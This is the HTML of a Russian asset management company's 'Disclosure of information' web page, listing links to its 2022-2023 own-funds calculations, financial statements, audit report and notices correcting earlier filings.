
	<!-- Body -->
	<div class="body">
		<div class="container">
			<!-- Header -->
			                                                                                                                                      

                                                                                                                                                                                           	
<header class="header" role="banner">
				<div class="header-inner clearfix">
					<a class="brand pull-left" href="/">
						<span class="site-title" title="Общество с ограниченной ответственностью Управляющая компания «Резерв Эссет Менеджмент»">Общество с ограниченной ответственностью Управляющая компания «Резерв Эссет Менеджмент»</span>											</a>
					<div class="header-search pull-right">
						
					</div>
				</div>
			</header>
							<nav class="navigation" role="navigation">
					<div class="navbar pull-left">
						<a class="btn btn-navbar collapsed" data-toggle="collapse" data-target=".nav-collapse">
							<span class="icon-bar"></span>
							<span class="icon-bar"></span>
							<span class="icon-bar"></span>
						</a>
					</div>
					<div class="nav-collapse">
						<ul class="nav menu nav-pills">
<li class="item-101 default"><a href="/index.php">Главная</a></li><li class="item-114 current active"><a href="/index.php/raskrytie-informatsii">Раскрытие информации</a></li><li class="item-127"><a href="/index.php/o-rukovodstve">О руководстве</a></li><li class="item-123 parent"><a href="/index.php/zpif-nedvizhimosti">ЗПИФ недвижимости</a></li><li class="item-115"><a href="/index.php/kontakty">Контакты</a></li><li class="item-116"><a href="/index.php/edo">ЭДО</a></li><li class="item-113"><a href="/index.php/o-kompanii">О компании</a></li></ul>

					</div>
				</nav>
						
			<div class="row-fluid">
								<main id="content" role="main" class="span9">
					<!-- Begin Content -->
							<div class="moduletable">
						

<div class="custom">
	<p><img src="/images/headers/blue-flower.jpg" alt="Blue Flower"></p></div>
		</div>
	
					<div id="system-message-container">
	</div>

					<div class="item-page" itemscope="" itemtype="https://schema.org/Article">
	<meta itemprop="inLanguage" content="ru-RU">
	
		
			<div class="page-header">
					<h2 itemprop="headline">
				Раскрытие информации			</h2>
									</div>
							
<div class="icons">
	
					<div class="btn-group pull-right">
				<a class="btn dropdown-toggle" data-toggle="dropdown" href="#"> <span class="icon-cog"></span><span class="caret"></span> </a>
								<ul class="dropdown-menu">
											<li class="print-icon"> <a href="/index.php/raskrytie-informatsii?tmpl=component&amp;print=1&amp;page=" title="Print article < Раскрытие информации >" onclick="window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no'); return false;" rel="nofollow"><span class="icon-print"></span>Печать</a> </li>
																<li class="email-icon"> <a href="/index.php/component/mailto/?tmpl=component&amp;template=protostar&amp;link=71b9952f1bfe389ee1bc467ddc5f8765059e2cb1" title="Email this link to a friend" onclick="window.open(this.href,'win2','width=400,height=350,menubar=yes,resizable=yes'); return false;" rel="nofollow"><span class="icon-envelope"></span>E-mail</a> </li>
														</ul>
			</div>
		
	</div>
			
	
	
				
								<div itemprop="articleBody">
		<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify">&nbsp;</p>
<p style="text-align: justify;" align="justify"><a href="/documents/РСС%20за%20май%202023.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;">Расчет размера собственных средств на 31.05.2023, раскрыт 14.06.2023</span></span></span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;">&nbsp;</span></span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/РСС%20сайт%20300423.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Расчет размера собственных средств на 30.04.2023, раскрыт 17.05.2023</span></span></a></p>
<p style="text-align: justify;" align="justify">&nbsp;</p>
<p style="text-align: justify;" align="justify"><a href="/documents/БФО%201-2023%20пдп.PDF" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Бухгалтерский баланс, отчет о финансовых результатах, отчет о потоках денежных средств и отчет об изменениях собственного капитала ООО УК "РЭМ" на 31.03.2023</span></span>&nbsp;<span style="font-size: 16px; color: #0000ff; font-family: arial, helvetica, sans-serif;">раскрыт 26.04.2023</span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/audit_report%202022.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Финансовая отчетность, подготовленная в соответствии с международными стандартами&nbsp;</span></span><span style="font-size: 16px; color: #0000ff; font-family: arial, helvetica, sans-serif;">финансовой отчетности (МСФО) за год, закончившийся 31.12.2022 г. раскрыт 26.04.2023</span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/НСО_УК_0420514_1_Разделы_(4.2)_март.pdf" target="_blank"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;">Расчет размера собственных средств на 31.03.2023, раскрыт 14.04.2023</span></span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/Сообщение__31.03.2023.pdf" target="_blank"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">Сообщение об обнаружении (выявлении) неточных, неполных и (или) недостоверных сведений в раскрываемой информации в связи с изменением (корректировкой) ранее размещенной информации в отношении Расчета размера собственных средств Управляющей компании по состоянию на 28.02.2023.</span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/Расчет%20СС%20по%20состоянию%20на%2028.02.2023.pdf" target="_blank"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;">Расчет размера собственных средств на 28.02.2023, раскрыт 31.03.2023 (в связи с внесением изменений)</span></span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/На%20сайт__БФО%20РЭМ.pdf" target="_blank"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;">Бухгалтерская (финансовая) отчетность на 31 декабря 2022 года (Дата опубликования - 17.03.2023)</span></span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/На%20сайт__АЗ%20РЭМ.pdf" target="_blank"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">Аудиторское заключение независимого аудитора о годовой бухгалтерской (финансовой) отчетности ООО УК "РЭМ" за 2022 г. (дата опубликования - 17.03.2023).</span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/Размер%20СС%20на%2028.02.2023%20г.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Расчет размера собственных средств на 28.02.2023, раскрыт 15.03.2023</span></span></a></p>
<p style="text-align: justify;" align="justify">&nbsp;</p>
<p style="text-align: justify;" align="justify"><a href="/documents/03_10__Сообщение__30.11.2022.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Сообщение об обнаружении (выявлении) неточных, неполных и (или) недостоверных сведений в раскрываемой информации в связи с изменением (корректировкой) ранее размещенной информации в отношении Расчета размера собственных средств Управляющей компании по состоянию на 30.11.2022.</span></span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/02_10__Расчет%20СС%20на%2030.11.2022.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Расчет размера собственных средств на 30.11.2022, раскрыт 13.03.2023 (в связи с внесением изменений)</span></span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;"><a href="/documents/03_9__Сообщение__31.10.2022.pdf" target="_blank" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px; color: #002b41;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Сообщение об обнаружении (выявлении) неточных, неполных и (или) недостоверных сведений в раскрываемой информации в связи с изменением (корректировкой) ранее размещенной информации в отношении Расчета размера собственных средств Управляющей компании по состоянию на 31.10.2022.</span></span> </a> </span> </span></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/02_9__Расчет%20СС%20на%2031.10.2022.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Расчет размера собственных средств на 31.10.2022, раскрыт 13.03.2023 (в связи с внесением изменений)</span></span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;"><a href="/documents/03_8__Сообщение__30.09.2022.pdf" target="_blank" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Сообщение об обнаружении (выявлении) неточных, неполных и (или) недостоверных сведений в раскрываемой информации в связи с изменением (корректировкой) ранее размещенной информации в отношении Расчета размера собственных средств Управляющей компании по состоянию на 30.09.2022.</span></span> </a> </span> </span></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/02_8__Расчет%20СС%20на%2030.09.2022.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Расчет размера собственных средств на 30.09.2022, раскрыт 13.03.2023 (в связи с внесением изменений)</span></span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;"><a href="/documents/03_7__Сообщение__31.08.2022.pdf" target="_blank" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Сообщение об обнаружении (выявлении) неточных, неполных и (или) недостоверных сведений в раскрываемой информации в связи с изменением (корректировкой) ранее размещенной информации в отношении Расчета размера собственных средств Управляющей компании по состоянию на 31.08.2022.</span></span> </a> </span> </span></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/02_7__Расчет%20СС%20на%2031.08.2022.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Расчет размера собственных средств на 31.08.2022, раскрыт 13.03.2023 (в связи с внесением изменений)</span></span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/03_6__Сообщение__31.07.2022.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Сообщение об обнаружении (выявлении) неточных, неполных и (или) недостоверных сведений в раскрываемой информации в связи с изменением (корректировкой) ранее размещенной информации в отношении Расчета размера собственных средств Управляющей компании по состоянию на 31.07.2022.</span></span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/02_6__Расчет%20СС%20на%2031.07.2022.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Расчет размера собственных средств на 31.07.2022, раскрыт 13.03.2023 (в связи с внесением изменений)</span></span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/03_5__Сообщение__30.06.2022.pdf" target="_blank" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px; color: #002b41;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Сообщение об обнаружении (выявлении) неточных, неполных и (или) недостоверных сведений в раскрываемой информации в связи с изменением (корректировкой) ранее размещенной информации в отношении Расчета размера собственных средств Управляющей компании по состоянию на 30.06.2022.</span></span></span></span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/02_5__Расчет%20СС%20на%2030.06.2022.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Расчет размера собственных средств на 30.06.2022, раскрыт 13.03.2023 (в связи с внесением изменений)</span></span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;"><a href="/documents/03_4__Сообщение__31.05.2022.pdf" target="_blank" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Сообщение об обнаружении (выявлении) неточных, неполных и (или) недостоверных сведений в раскрываемой информации в связи с изменением (корректировкой) ранее размещенной информации в отношении Расчета размера собственных средств Управляющей компании по состоянию на 31.05.2022.</span></span> </a> </span> </span></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/02_4__Расчет%20СС%20на%2031.05.2022.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Расчет размера собственных средств на 31.05.2022, раскрыт 13.03.2023 (в связи с внесением изменений)</span></span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;"><a href="/documents/03_3__Сообщение__30.04.2022.pdf" target="_blank" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Сообщение об обнаружении (выявлении) неточных, неполных и (или) недостоверных сведений в раскрываемой информации в связи с изменением (корректировкой) ранее размещенной информации в отношении Расчета размера собственных средств Управляющей компании по состоянию на 30.04.2022.</span></span> </a> </span> </span></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/02_3__Расчет%20СС%20на%2030.04.2022.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Расчет размера собственных средств на 30.04.2022, раскрыт 13.03.2023 (в связи с внесением изменений)</span></span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/03_2__Сообщение__31.03.2022.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Сообщение об обнаружении (выявлении) неточных, неполных и (или) недостоверных сведений в раскрываемой информации в связи с изменением (корректировкой) ранее размещенной информации в отношении Расчета размера собственных средств Управляющей компании по состоянию на 31.03.2022.</span></span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/02_2__Расчет%20СС%20на%2031.03.2022.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Расчет размера собственных средств на 31.03.2022, раскрыт 13.03.2023 (в связи с внесением изменений)</span></span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;"><a href="/documents/03_1__Сообщение__28.02.2022.pdf" target="_blank" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Сообщение об обнаружении (выявлении) неточных, неполных и (или) недостоверных сведений в раскрываемой информации в связи с изменением (корректировкой) ранее размещенной информации в отношении Расчета размера собственных средств Управляющей компании по состоянию на 28.02.2022.</span></span> </a> </span> </span></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/02_1__Расчет%20СС%20на%2028.02.2022.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Расчет размера собственных средств на 28.02.2022, раскрыт 13.03.2023 (в связи с внесением изменений)</span></span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/03_1__Сообщение__31.12.2022.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Сообщение об обнаружении (выявлении) неточных, неполных и (или) недостоверных сведений в раскрываемой информации в связи с изменением (корректировкой) ранее размещенной информации в отношении Расчета размера собственных средств Управляющей компании по состоянию на 31.12.2022.</span></span></a></p>
<p style="text-align: justify;" align="justify"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">&nbsp;</span></span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/03_2__Сообщение__31.01.2023.pdf" target="_blank"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;"><span style="font-size: 16px;">Сообщение об обнаружении (выявлении) неточных, неполных и (или) недостоверных сведений в раскрываемой информации в связи с изменением (корректировкой) ранее размещенной информации в отношении Расчета размера собственных средств Управляющей компании по состоянию на 31.01.2023.</span></span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/НСО_УК_0420514_1_Разделы_(4.2)_31.01.pdf" target="_blank"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span color="#0000ff" face="arial, helvetica, sans-serif" style="color: #0000ff; font-family: arial, helvetica, sans-serif;">Расчет размера собственных средств на 31.01.2023, раскрыт 22.02.2023 (в связи с внесением изменений)</span></span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/НСО_УК_0420514_1_Разделы_(4.2)_31.12.pdf" target="_blank"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">Расчет размера собственных средств на 31.12.2022, раскрыт 22.02.2023 (в связи с внесением изменений)</span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/РСС%20на%2031.01.2023.pdf" target="_blank" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">Расчет размера собственных средств на 31.01.2023, раскрыт 06.03.2023</span></span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/НСО_УК_0420514_1_Разделы_(4.2)_12.pdf" target="_blank" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">Расчет размера собственных средств на 31.12.2022, раскрыт 20.01.2023</span></span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/РСО%20на%2030.11.22%20для%20сайта.pdf" target="_blank"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">Расчет размера собственных средств на 30.11.2022, раскрыт 13.12.2022</span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/НСО_УК_0420514_1_Разделы_(4.2)%201.pdf" target="_blank" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">Расчет размера собственных средств на 31.10.2022, раскрыт 14.11.2022</span></span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/БФО%203-2022%20для%20сайта%20.PDF" target="_blank"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">Бухгалтерский баланс, отчет о финансовых результатах, отчет о потоках денежных средств и отчет об изменениях собственного капитала ООО УК "РЭМ" на 30.09.2022</span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;"><span style="color: #000000;">Дата опубликования информации - 25.10.2022</span></span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/НСО_УК_0420514_1_Разделы_(4.2)%2009.pdf" target="_blank"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">Расчет размера собственных средств на 30.09.2022, раскрыт 14.10.2022</span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/Для%20сайта%20НСО_УК_0420514_1_08-2022.pdf" target="_blank"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">Расчет размера собственных средств на 31.08.2022, раскрыт 14.09.2022</span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/Для%20сайта%20РСС%2007-2022%20.pdf" target="_blank"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">Расчет размера собственных средств на 31.07.2022, раскрыт 09.08.2022</span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/БФО%20%20для%20сайта%202-2022.PDF" target="_blank"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">Бухгалтерский баланс, отчет о финансовых результатах, отчет о потоках денежных средств и отчет об изменениях собственного капитала ООО УК "РЭМ" на 30.06.2022</span></a></p>
<p style="text-align: justify;" align="justify"><span style="color: #000000; font-family: arial, helvetica, sans-serif; font-size: 16px;">Дата опубликования информации - 27.07.2022</span></p>
<p style="text-align: justify;" align="justify"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">&nbsp;</span></p>
<p style="text-align: justify;" align="justify"><a href="/documents/РСС%2006-2022%20на%20сайт.pdf" target="_blank"><span style="color: #0000ff; font-family: arial, helvetica, sans-serif; font-size: 12pt;">Расчет размера собственных средств на 30.06.2022, раскрыт 14.07.2022</span></a></p>
